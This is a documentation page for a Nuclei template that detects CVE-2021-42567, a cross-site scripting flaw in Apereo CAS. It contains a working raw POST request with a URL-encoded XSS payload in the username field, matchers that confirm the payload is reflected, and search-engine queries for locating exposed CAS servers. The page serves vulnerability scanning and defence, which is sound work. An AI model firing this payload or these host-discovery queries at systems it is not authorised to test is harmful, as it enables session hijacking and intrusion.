Skip to content
Nuclei Templates

Apereo CAS Cross-Site Scripting

ID: CVE-2021-42567

Severity: medium

Author: pdteam

Tags: cve2021,cve,apereo,xss,cas

Description

Section titled “Description”

Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.

YAML Source

Section titled “YAML Source”
id: CVE-2021-42567


info:
  name: Apereo CAS Cross-Site Scripting
  author: pdteam
  severity: medium
  description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, data theft, or defacement.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://apereo.github.io/2021/10/18/restvuln/
    - https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html
    - https://github.com/sudohyak/exploit/blob/dcf04f704895fe7e042a0cfe9c5ead07797333cc/CVE-2021-42567/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42567
    - https://github.com/apereo/cas/releases
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-42567
    cwe-id: CWE-79
    epss-score: 0.25981
    epss-percentile: 0.96712
    cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apereo
    product: central_authentication_service
    shodan-query:
      - http.title:'CAS - Central Authentication Service'
      - http.title:'cas - central authentication service'
    fofa-query: title='cas - central authentication service'
    google-query: intitle:'cas - central authentication service'
  tags: cve2021,cve,apereo,xss,cas


http:
  - raw:
      - |
        POST /cas/v1/tickets/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<img/src/onerror=alert(document.domain)>'
          - 'java.util.HashMap'
        condition: and


      - type: status
        status:
          - 401
# digest: 4b0a004830460221009ec816ad2f39398ee8c771fafc28cdba009d0ecc786f4d71d9a340e39389a77d022100d0ce1d2b40d751b88cb255273ea3e7cd02a76d30af62846051882ef59f0a8a1e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-42567.yaml"

View on Github